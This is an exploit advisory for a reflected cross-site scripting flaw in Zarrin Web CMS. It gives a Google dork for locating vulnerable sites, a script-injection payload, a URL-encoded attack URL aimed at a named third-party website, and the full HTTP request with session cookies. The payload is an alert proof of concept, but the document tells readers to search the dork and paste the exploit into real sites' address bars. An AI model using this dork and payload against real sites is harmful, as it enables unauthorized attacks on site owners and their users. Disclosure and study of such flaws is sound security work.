[+] Exploit Title ; Zarrin Web cms Cross Site Scripting vulnerability [+] Date : 2017-11-12 [+] Author : 0p3n3r From IRANIAN ETHICAL HACKERS [+] Vendor Homepage : http://www.zarrinweb.com/ [+] Dork : intext:"طراحی ، توسعه و بهینه سازی شده توسط زرین وب" [+] Tested On : windows 10 - kali linux 2.0 [+] Contact : https://telegram.me/WebServer [+] Poc : [!] Search Dork on google and add exploit to Address bar [+] Vulnerability File: [!] search.php [+] Exploit : [!] "></script><script>alert('0P3N3R');</script> [+] Target : [!] http://www.goller.ir/shared/tags.php?tags_page&ERROR=%D9%86%D9%81%D8%AA%22%3E%3C/script%3E%3Cscript%3Ealert(%270P3N3R%27);%3C/script%3E [+] Request : GET /shared/tags.php?tags_page&ERROR=%D9%86%D9%81%D8%AA%22%3E%3C/script%3E%3Cscript%3Ealert(%270P3N3R%27);%3C/script%3E HTTP/1.1 Host: www.goller.ir User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=dn8218sbtm8g5p1hckkjv2apa6; _ga=GA1.2.2003391358.1510506074; _gid=GA1.2.2142676411.1510506074 Connection: keep-alive Upgrade-Insecure-Requests: 1